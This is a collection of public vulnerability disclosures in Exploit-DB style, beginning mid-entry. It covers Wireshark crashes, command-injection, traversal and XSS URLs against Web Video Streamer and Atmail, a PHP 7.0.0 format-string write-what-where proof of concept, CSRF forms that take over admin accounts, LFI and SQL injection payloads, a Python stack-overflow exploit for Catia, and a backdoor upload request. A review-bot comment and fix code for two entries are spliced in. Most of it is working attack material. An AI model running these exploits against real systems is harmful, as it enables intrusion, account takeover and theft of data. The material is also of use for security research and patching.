    #26 0x7fc44e4943c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
    #27 0x5264eb in process_packet wireshark/tshark.c:3728:5
    #28 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
    #29 0x515daf in main wireshark/tshark.c:2197:13

0x60200035b1df is located 0 bytes to the right of 15-byte region [0x60200035b1d0,0x60200035b1df)
allocated by thread T0 here:
    #0 0x4c0bc8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
    #1 0x7fc446a1c610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)

SUMMARY: AddressSanitizer: heap-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
==6158==ABORTING
--- cut ---

The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11826. Attached are two files which trigger the crash.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39077.zip
-
Wireshark - 'infer_pkt_encap' Heap Out-of-Bounds Read
Source: https://code.google.com/p/google-security-research/issues/detail?id=658

The following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):

--- cut ---
==6473==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001335c at pc 0x7f391e585d1e bp 0x7ffc0ff625c0 sp 0x7ffc0ff625b8
READ of size 1 at 0x61b00001335c thread T0
    #0 0x7f391e585d1d in infer_pkt_encap wireshark/wiretap/ngsniffer.c:1767:27
    #1 0x7f391e582ac7 in fix_pseudo_header wireshark/wiretap/ngsniffer.c:1805:11
    #2 0x7f391e57d07e in ngsniffer_process_record wireshark/wiretap/ngsniffer.c:1299:20
    #3 0x7f391e576418 in ngsniffer_read wireshark/wiretap/ngsniffer.c:1034:9
    #4 0x7f391e62429b in wtap_read wireshark/wiretap/wtap.c:1309:7
    #5 0x51f7ea in load_cap_file wireshark/tshark.c:3479:12
    #6 0x515daf in main wireshark/tshark.c:2197:13

0x61b00001335c is located 0 bytes to the right of 1500-byte region [0x61b000012d80,0x61b00001335c)
allocated by thread T0 here:
    #0 0x4c0bc8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
    #1 0x7f390a251610 in g_malloc (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4e610)
    #2 0x7f391e48d0e5 in wtap_open_offline wireshark/wiretap/file_access.c:1105:2
    #3 0x51bd1d in cf_open wireshark/tshark.c:4195:9
    #4 0x51584e in main wireshark/tshark.c:2188:9

SUMMARY: AddressSanitizer: heap-buffer-overflow wireshark/wiretap/ngsniffer.c:1767:27 in infer_pkt_encap
==6473==ABORTING
--- cut ---

The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11827. Attached are two files which trigger the crash.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39076.zip
-
Web Video Streamer - Multiple Vulnerabilities
source: https://www.securityfocus.com/bid/65350/info

Web Video Streamer is prone to the following multiple security vulnerabilities:

1. Multiple cross-site scripting vulnerabilities
2. A directory-traversal vulnerability
3. A command-injection vulnerability

A remote attacker can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and gain access to sensitive information, which may aid in launching further attacks.

Web Video Streamer 1.0 is vulnerable; other versions may also be affected.

http://www.example.com/webstreamer-master/player.php?name=drops.avi&file=drop.avi';ls>/tmp/foo;a'&type=video/mp4&t=1389685059
http://www.example.com/webstreamer-master/index.php?dir=../../../

XSS:

http://www.example.com/webstreamer-master/player.php?name=%3Cscript%3Ealert%281%29%3C/script%3Etest
http://www.example.com/webstreamer-master/index.php?dir=../../%3Cscript%3Ealert%281%29%3C/script%3E
-
Atmail WebMail - Message Attachment File Name Reflected Cross-Site Scripting
source: https://www.securityfocus.com/bid/65408/info

Atmail is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Atmail 7.0.2 is vulnerable; other versions may also be affected.

http://www.example.com/index.php/mail/viewmessage/getattachment/folder/INBOX/uniqueId/<ID>/filenameOriginal/[XSS]
-
Atmail WebMail - 'searchResultsTab5?filter' Reflected Cross-Site Scripting
source: https://www.securityfocus.com/bid/65408/info

Atmail is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Atmail 7.0.2 is vulnerable; other versions may also be affected.

http://www.example.com/index.php/mail/mail/listfoldermessages/searching/true/selectFolder/INBOX/resultContext/searchResultsTab5?searchQuery=&goBack=6&from=&to=&subject=&body=&filter=[XSS]
-
Atmail WebMail - 'INBOX.Trash?mailId' Reflected Cross-Site Scripting
source: https://www.securityfocus.com/bid/65408/info

Atmail is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Atmail 7.0.2 is vulnerable; other versions may also be affected.

http://www.example.com/index.php/mail/mail/movetofolder/fromFolder/INBOX/toFolder/INBOX.Trash?resultContext=messageList&listFolder=INBOX&pageNumber=1&unseen%5B21%5D=0&mailId%5B%5D=[XSS]
-
PHP 7.0.0 - Format String
Overview
--------------------------------------------

A fun little format string vulnerability exists in PHP 7.0.0 due to how non-existent class names are handled. From my limited research I believe this issue is likely exploitable for full code execution (see test script below). This issue does not appear to be present in previous PHP versions and has been patched in version 7.0.1.

If you build a working exploit, drop me a line, I'd love to see (andrew at jmpesp dot org).

Shout out to the PHP team for fixing this so quickly and for building a great product. Greetz to my DSU crew.

Timeline
--------------------------------------------

12/11/2015: Discovered
12/12/2015: Reported to PHP team
12/13/2015: Patch accepted and committed
12/17/2015: PHP 7.0.1 released containing patch
12/22/2015: Publicly disclosed

Vulnerability/Patch
--------------------------------------------

diff -rup php-7.0.0_old/Zend/zend_execute_API.c php-7.0.0_new/Zend/zend_execute_API.c
--- php-7.0.0_old/Zend/zend_execute_API.c 2015-12-01 07:36:25.000000000 -0600
+++ php-7.0.0_new/Zend/zend_execute_API.c 2015-12-12 12:24:24.999391117 -0600
@@ -218,7 +218,7 @@ static void zend_throw_or_error(int fetc zend_vspprintf(&message, 0, format, va); if (fetch_type & ZEND_FETCH_CLASS_EXCEPTION) { - zend_throw_error(exception_ce, message); + zend_throw_error(exception_ce, "%s", message); } else { zend_error(E_ERROR, "%s", message); }

Proof of Concept #1 (simple segfault)
--------------------------------------------

<?php
$name="%n%n%n%n%n";
$name::doSomething();
?>

Proof of Concept #2 (write-what-where primitive)
--------------------------------------------

andrew@thinkpad /tmp/php-7.0.0_64 % cat /tmp/test.php
<?php
ini_set("memory_limit", "4G");

// there's probably a much cleaner way to do this
$rdx = 0x42424242; // what
$rax = 0x43434343; // where
$name = "%" . ($rdx - 8) . "d" . "%d" . "%n" . str_repeat("A", ($rax - 34)); // your offsets may differ.
$name::doSomething();
?>

andrew@thinkpad /tmp/php-7.0.0_64 % gdb sapi/cli/php
GNU gdb (GDB) 7.10
Copyright (C) 2015 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-unknown-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from sapi/cli/php...done.
(gdb) r /tmp/test.php
Starting program: /tmp/php-7.0.0_64/sapi/cli/php /tmp/test64.php
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x0000000000672935 in xbuf_format_converter (xbuf=xbuf@entry=0x7fffffffa610, is_char=is_char@entry=1 '\001', fmt=<optimized out>, ap=0x7fffffffa658) at /tmp/php-7.0.0_64/main/spprintf.c:744
744         *(va_arg(ap, int *)) = is_char? (int)((smart_string *)xbuf)->len : (int)ZSTR_LEN(((smart_str *)xbuf)->s);
(gdb) i r
rax            0x43434343          1128481603
rbx            0x7fffb2800016      140736188121110
rcx            0x6e                110
rdx            0x42424242          1111638594
rsi            0x7fffffff9db0      140737488330160
rdi            0x7fffffffa658      140737488332376
rbp            0x1                 0x1
rsp            0x7fffffff9d50      0x7fffffff9d50
r8             0x7fffffff9db0      140737488330160
r9             0x7fffb2800016      140736188121110
r10            0x0                 0
r11            0x0                 0
r12            0x20                32
r13            0x7fffffffa610      140737488332304
r14            0x0                 0
r15            0x4242423a          1111638586
rip            0x672935            0x672935 <xbuf_format_converter+1845>
eflags         0x10202             [ IF RF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
(gdb) x/1i $rip
=> 0x672935 <xbuf_format_converter+1845>:   mov    DWORD PTR [rax],edx
(gdb)
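Review bot: The one-line change in the zend_throw_or_error hunk is the right fix and brings the exception branch in line with the `zend_error(E_ERROR, "%s", message)` branch directly below it: `message` is produced by `zend_vspprintf` from a caller-supplied format that embeds the (user-controlled) class name, so it must only ever travel as a `%s` argument, never as the format string itself. To keep the same mistake from reappearing at other call sites, it is worth annotating `zend_throw_error` with a printf-style format attribute so that a build with `-Wformat-security` warns on any non-literal format argument.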
-
Grawlix 1.0.3 - Cross-Site Request Forgery
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Grawlix 1.0.3
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://www.getgrawlix.com/
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 11/17/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

CVSS
Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

Description
Grawlix is a CMS for publishing comics, which is written in PHP. In version 1.0.3, it does not have CSRF protection, which means that an attacker can perform actions for a victim if the victim visits an attacker-controlled site while logged in. An attacker can, for example, change the password of an existing admin account, which may in turn lead to code execution via a different vulnerability in the admin area.

3. Proof of Concept

Change admin password:

<html>
  <body>
    <form action="http://localhost/grawlix-1.0.3/grawlix-1.0.3/_admin/user.config.php" method="POST">
      <input type="hidden" name="username[1]" value="admin" />
      <input type="hidden" name="email[1]" value="admin@example.com" />
      <input type="hidden" name="password[1]" value="admin" />
      <input type="hidden" name="confirm_password[1]" value="admin" />
      <input type="hidden" name="submit" value="save" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

11/17/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/21/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/Grawlix-103-CSRF-128.html

--
blog: https://blog.curesec.com
tweet: https://twitter.com/curesec

Curesec GmbH
Curesec Research Team
Romain-Rolland-Str 14-24
13089 Berlin, Germany
-
Bigware Shop 2.3.01 - Multiple Local File Inclusions
# Title: Bigware Shop 2.3.01 Multiple Local File Inclusion Vulnerabilities
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Twitter: twitter.com/bd0rk
# Tested on: Ubuntu-Linux
# Vendor: http://www.bigware.de
# Download: http://www.bigware.de/download/bigware_software_-_vollversion/Bigware_Shop.zip

Proof-of-Concept1:

/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php source-line 58
**********************************************************************
require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php');
**********************************************************************

[+]Sploit1:
http://[target]/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php?language=/../../../../yourFILE.php

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof-of-Concept2:

/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php source-line 56
*********************************************************************
require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php');
*********************************************************************

[+]Sploit:
http://[target]/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php?language=/../../../../yourFILE.php

=> Vuln-Description: The $language parameter isn't declared before the require, so an attacker can control it and read in (include) arbitrary local files.

=> Vendor-Solution: Please declare this parameter before the require.

***Greetings fr0m Germany: zone-h.org-Team, exploit-db.com, GoLd_M, Kim Dotcom***

MERRY CHRISTMAS BRO'S! :)
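As an added illustration of the vendor-side fix (example code, not Bigware's own), the hardened include below declares $language explicitly and only accepts a short language code that resolves to a file inside the language directory. The default code 'german', the $_GET call site and PHP 7.1+ are assumptions.

```php
<?php
// Added example, not Bigware's code. Safe replacement for the vulnerable line
//   require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php');
// which used an undeclared $language and so let the request choose the path.

/**
 * Resolve a language code to a file inside $langDir, or return null.
 * Only short codes of letters, digits, '_' and '-' are accepted, which rules
 * out '../', '/', '.' and NUL bytes; realpath() then confirms that the
 * resolved file really lies below the language directory.
 */
function resolveLanguageFile(string $langDir, $language, string $default): ?string
{
    if (!is_string($language) || !preg_match('/^[A-Za-z0-9_-]{1,16}\z/', $language)) {
        $language = $default;   // arrays, empty values and path characters fall back
    }

    $base = realpath($langDir);
    $file = realpath($langDir . DIRECTORY_SEPARATOR . $language . '.php');

    // realpath() returns false for missing files; also require the file to be below $base.
    if ($base === false || $file === false
        || strpos($file, rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $file;
}

// Assumed call site at the top of main_bigware_12.php / main_bigware_115.php:
// declare $language from the request instead of relying on an undeclared global.
$language = isset($_GET['language']) ? $_GET['language'] : null;
$langFile = resolveLanguageFile(dirname(dirname(__FILE__)) . '/language', $language, 'german');

if ($langFile === null) {
    http_response_code(400);
    exit('Unknown language.');
}

require $langFile;
```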
-
Arastta 1.1.5 - SQL Injection
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: Arastta 1.1.5
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://arastta.org/
Vulnerability Type: SQL Injection
Remote Exploitable: Yes
Reported to vendor: 11/21/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

Arastta is an eCommerce software written in PHP. In version 1.1.5, it is vulnerable to two SQL injection vulnerabilities: one normal injection when searching for products via tags, and one blind injection via the language setting. Both of them require a user with special privileges to trigger.

3. SQL Injection 1

CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description
There is an SQL Injection when retrieving products. Currently, only the "filter" variable is vulnerable. Note that the "tag_name" variable would also be vulnerable to SQL injection if there wasn't a filter that forbids single quotes in the URL. As defense in depth, it might be a good idea to sanitize that value here as well.

Note that an account with the right "Catalog -> Filters" is needed to exploit this issue.

Proof of Concept

POST /Arastta/admin/index.php?route=catalog/product/autocomplete&token=3d6cfa8f9f602a4f47e0dfbdb989a469&filter_name=a&tag_name= HTTP/1.1

tag_text[][value]=abc') union all select password from gv4_user -- -

Code

/admin/model/catalog/product.php

public function getTags($tag_name, $filter_tags = null) {
    [...]
    $query = $this->db->query("SELECT DISTINCT(tag) FROM `" . DB_PREFIX . "product_description` WHERE `tag` LIKE '%" . $tag_name . "%'" . $filter);

/admin/controller/catalog/product.php

public function autocomplete() {
    [...]
    if (isset($this->request->get['tag_name'])) {
        $this->load->model('catalog/product');

        if (isset($this->request->get['tag_name'])) {
            $tag_name = $this->request->get['tag_name'];
        } else {
            $tag_name = '';
        }

        $filter = null;
        if(isset($this->request->post['tag_text'])) {
            $filter = $this->request->post['tag_text'];
        }

        $results = $this->model_catalog_product->getTags($tag_name, $filter);

        foreach ($results as $result) {
            $json[] = array(
                'tag'    => $result,
                'tag_id' => $result
            );
        }
    }

4. SQL Injection 2

CVSS
Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P

Description
There is a second order timing based SQL injection when choosing the language setting. An admin account with the right "Setting -> Setting" is needed to exploit this issue. Alternatively, a user with the right "Localisation -> Languages" can inject a payload as well. However, a user with the right "Setting -> Setting" is still needed to choose the malicious language to trigger the payload.

Proof of Concept

Visit the setting page: http://localhost/Arastta/admin/index.php?route=setting/setting

For the config_language and config_admin_language parameters use:

en' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) -- -

Visiting any site will trigger the injected code.

Code

/Arastta/system/library/utility.php

public function getDefaultLanguage(){
    if (!is_object($this->config)) {
        return;
    }

    $store_id = $this->config->get('config_store_id');

    if (Client::isAdmin()){
        $sql = "SELECT * FROM " . DB_PREFIX . "setting WHERE `key` = 'config_admin_language' AND `store_id` = '" . $store_id . "'";
    } else {
        $sql = "SELECT * FROM " . DB_PREFIX . "setting WHERE `key` = 'config_language' AND `store_id` = '" . $store_id . "'";
    }

    $query = $this->db->query($sql);
    $code = $query->row['value'];

    $language = $this->db->query("SELECT * FROM " . DB_PREFIX . "language WHERE `code` = '" . $code . "'");

    return $language->row;
}

5. Solution

This issue was not fixed by the vendor.

6. Report Timeline

11/21/2015 Informed Vendor about Issue (no reply)
12/10/2015 Reminded Vendor of Disclosure Date (no reply)
12/17/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/Arastta-115-SQL-Injection-131.html
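The hardened variant of the getTags() query below is an added example, not Arastta's code. It uses PDO prepared statements so that neither tag_name nor the tag_text[][value] entries ever become part of the SQL text; because the advisory elides how $filter is built, the example assumes the filter excludes tags already supplied in tag_text, and the DSN, credentials and fetchTags() name are placeholders.

```php
<?php
// Added example, not Arastta's code: prepared-statement version of the query in
// admin/model/catalog/product.php getTags(). $prefix plays the role of DB_PREFIX
// (a config constant, never user input). The original $filter clause is elided in
// the advisory; here it is assumed to exclude the tags already chosen by the user.
function fetchTags(PDO $db, string $prefix, $tag_name, $filter_tags = null): array
{
    if (!is_string($tag_name)) {            // tag_name[]=... arrays are rejected, not cast
        return [];
    }
    if (!preg_match('/^[A-Za-z0-9_]{0,64}\z/', $prefix)) {
        throw new InvalidArgumentException('bad table prefix');
    }

    // Escape LIKE metacharacters so the user can search for a literal '%' or '_'
    // but cannot widen the match; MySQL's default LIKE escape character is '\'.
    $params = ['%' . addcslashes($tag_name, '%_\\') . '%'];
    $sql = "SELECT DISTINCT(tag) FROM `{$prefix}product_description` WHERE `tag` LIKE ?";

    if (is_array($filter_tags)) {
        $exclude = [];
        foreach ($filter_tags as $item) {        // each item is tag_text[][value] from POST
            if (is_array($item) && isset($item['value']) && is_string($item['value'])) {
                $exclude[] = $item['value'];
            }
        }
        if ($exclude) {
            // One placeholder per value; the values are bound, never concatenated, so the
            // advisory's abc') union all select ... payload is just a literal to compare.
            $sql .= ' AND `tag` NOT IN (' . implode(',', array_fill(0, count($exclude), '?')) . ')';
            $params = array_merge($params, $exclude);
        }
    }

    $stmt = $db->prepare($sql);
    $stmt->execute($params);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// Constructed usage (DSN, credentials and the gv4_ prefix from the PoC are placeholders):
// $db = new PDO('mysql:host=localhost;dbname=arastta;charset=utf8mb4', 'user', 'pass',
//               [PDO::ATTR_EMULATE_PREPARES => false, PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
// $tags = fetchTags($db, 'gv4_', $_GET['tag_name'] ?? '', $_POST['tag_text'] ?? null);
```

The same binding discipline closes the second-order case in getDefaultLanguage(): $code comes from a user-editable setting row, so it should be bound as a parameter of the language lookup rather than concatenated into the query.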
-
Singapore 0.9.9b Beta - Image Gallery Remote File Inclusion / Cross-Site Scripting
source: https://www.securityfocus.com/bid/65420/info

Singapore Image Gallery is prone to a remote file-include vulnerability and a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker can exploit these vulnerabilities to obtain potentially sensitive information, execute arbitrary script code in the context of the web server process, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site or steal cookie-based authentication credentials and launch other attacks.

Singapore 0.9.9b and 0.9.10 are vulnerable; other versions may also be vulnerable.

http://www.example.com/thumb.php?gallery=./00000000000-764&height=100&image=[File Upload]
-
PhpSocial 2.0.0304_20222226 - Cross-Site Request Forgery
Security Advisory - Curesec Research Team

1. Introduction

Affected Product: PhpSocial v2.0.0304_20222226
Fixed in: not fixed
Fixed Version Link: n/a
Vendor Website: http://phpsocial.net
Vulnerability Type: CSRF
Remote Exploitable: Yes
Reported to vendor: 11/21/2015
Disclosed to public: 12/21/2015
Release mode: Full Disclosure
CVE: n/a
Credits: Tim Coen of Curesec GmbH

2. Overview

CVSS
Medium 5.1 AV:N/AC:H/Au:N/C:P/I:P/A:P

Description
PhpSocial is a social networking software written in PHP. In version v2.0.0304, it does not have CSRF protection, which means that an attacker can perform actions for a victim if the victim visits an attacker-controlled site while logged in.

3. Proof of Concept

Add a new admin:

<html>
  <body>
    <form action="http://localhost/PhpSocial_v2.0.0304_20222226/cms_phpsocial/admin/AdminAddViewadmins.php" method="POST">
      <input type="hidden" name="admin_username" value="admin2" />
      <input type="hidden" name="admin_password" value="admin" />
      <input type="hidden" name="admin_password_confirm" value="admin" />
      <input type="hidden" name="admin_name" value="admin2" />
      <input type="hidden" name="admin_email" value="admin2@example.com" />
      <input type="hidden" name="task" value="addadmin" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

4. Solution

This issue was not fixed by the vendor.

5. Report Timeline

11/21/2015 Contacted Vendor (no reply)
12/10/2015 Tried to remind vendor (no email is given, security@phpsocial.net does not exist, and contact form could not be used because the website is down)
12/21/2015 Disclosed to public

Blog Reference:
https://blog.curesec.com/article/blog/PhpSocial-v200304-CSRF-133.html
-
Dassault Systemes Catia - Remote Stack Buffer Overflow
source: https://www.securityfocus.com/bid/65675/info

Catia is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary-checks on user-supplied input.

An attacker can exploit this issue to execute arbitrary code in the context of the application. Failed exploit attempts will result in a denial-of-service condition.

Catia V5-6R2013 is vulnerable.

#!/usr/bin/env python
import socket
import struct
import ctypes

RetAdd="\x90\x90\x90\x90"
Shell="S" *1000

buff= "\x00\x01\x00\x30" + "A" * 20 + "AppToBusInitMsg" +"\x00" + "\x00" * 48 + "CATV5_Backbone_Bus" +"\x00" + "\x00"* 49 + "\x00\x00\x00\x00"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.3", 55555))
#s.connect(("192.168.0.5", 55558))

s.send(struct.pack('>I',len(buff) ))
s.send(buff)

buff= "\x02\x00\x00\x00" + RetAdd*3 + "\x00\x00\x00\x00" * 13 + "\x00\x00\x00\x00" * 5 + "CATV5_AllApplications" +"\x00" + "\x00"* 43 +"\x00\x00\x98" + "\x00\x00\x00\x01" +"\x00"*4 +"\x08\x00\x00\x00" + Shell

s.send(struct.pack('>I',len(buff) ))
s.send(buff)
-
Joomla! Component Projoom NovaSFH 3.0.2 - 'upload.php' Arbitrary File Upload
source: https://www.securityfocus.com/bid/65438/info

Projoom NovaSFH plugin for Joomla! is prone to an arbitrary-file-upload vulnerability because it fails to adequately sanitize user-supplied input.

An attacker may leverage this issue to upload arbitrary files; this can result in arbitrary code execution within the context of the vulnerable application.

Projoom NovaSFH Plugin 3.0.2 is vulnerable; other versions may also be affected.

POST /administrator/components/com_novasfh/views/upload.php?action=upload&dest=L3Zhci93d3cvaHRtbA== HTTP/1.1
Host: <IP>
Proxy-Connection: keep-alive
Content-Length: 513
Origin: <originl>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36
Content-Type: multipart/form-data; boundary=----------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2
Accept: */*
DNT: 1
Referer: http://<host>/administrator/index.php?option=com_novasfh&c=uploader
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8

------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2
Content-Disposition: form-data; name="Filename"

php_backdoor.php
------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2
Content-Disposition: form-data; name="Filedata"; filename="php_backdoor3.php"
Content-Type: application/octet-stream

[PHP_CODE]
------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2
Content-Disposition: form-data; name="Upload"

Submit Query
------------ae0cH2Ij5ei4ei4Ef1Ij5Ij5ae0cH2--